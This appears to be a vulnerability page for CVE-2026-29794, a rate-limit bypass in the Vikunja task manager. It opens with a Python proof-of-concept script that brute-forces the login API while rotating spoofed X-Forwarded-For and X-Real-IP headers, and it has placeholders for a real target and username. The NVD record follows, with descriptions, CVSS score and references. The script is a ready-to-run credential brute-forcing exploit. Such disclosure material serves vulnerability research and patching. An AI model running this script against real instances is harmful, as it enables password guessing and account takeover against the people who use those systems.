CVE-2026-29794

import requests def exploit_rate_limit_bypass(target_url, username): """ PoC for CVE-2026-29794: Bypass rate limit by spoofing IP headers. This script simulates brute-forcing by rotating the X-Forwarded-For header. """ # Example endpoint: Vikunja login API endpoint = f"{target_url}/api/v1/login" # Simulate a range of IP addresses for i in range(1, 100): # Spoof the X-Forwarded-For header to bypass rate limiting spoofed_ip = f"192.168.{i % 255}.{(i * 10) % 255}" headers = { "User-Agent": "Mozilla/5.0 (PoC-Scanner)", "X-Forwarded-For": spoofed_ip, "X-Real-IP": spoofed_ip } # Payload for brute force simulation data = { "username": username, "password": f"password_{i}" # Simulating password guessing } try: response = requests.post(endpoint, headers=headers, json=data, timeout=5) print(f"Attempt {i} from IP {spoofed_ip}: Status {response.status_code}") if response.status_code == 200: print(f"[!] Potential successful login at attempt {i}") break except requests.exceptions.RequestException as e: print(f"Error connecting to {target_url}: {e}") if __name__ == "__main__": target = "http://localhost:3456" # Replace with target instance user = "admin" # Replace with target username exploit_rate_limit_bypass(target, user)

{"cve": {"id": "CVE-2026-29794", "sourceIdentifier": "[email protected]", "published": "2026-03-20T15:16:16.393", "lastModified": "2026-03-24T21:18:04.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Starting in version 0.8 and prior to version 2.2.0, unauthenticated users are able to bypass the application's built-in rate-limits by spoofing the `X-Forwarded-For` or `X-Real-IP` headers due to the rate-limit relying on the value of `(echo.Context).RealIP`. Unauthenticated users can abuse endpoints available to them for different potential impacts. The immediate concern would be brute-forcing usernames or specific accounts' passwords. This bypass allows unlimited requests against unauthenticated endpoints. Version 2.2.0 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. A partir de la versión 0.8 y antes de la versión 2.2.0, los usuarios no autenticados pueden eludir los límites de tasa incorporados de la aplicación suplantando los encabezados `X-Forwarded-For` o `X-Real-IP` debido a que el límite de tasa se basa en el valor de `(echo.Context).RealIP`. Los usuarios no autenticados pueden abusar de los puntos finales disponibles para ellos para diferentes impactos potenciales. La preocupación inmediata sería el ataque de fuerza bruta de nombres de usuario o contraseñas de cuentas específicas. Esta elusión permite solicitudes ilimitadas contra puntos finales no autenticados. La versión 2.2.0 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8", "versionEndExcluding": "2.2.0", "matchCriteriaId": "3F4BEFD9-23A0-4330-B595-2942F3550AF0"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-m547-hp4w-j6jx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}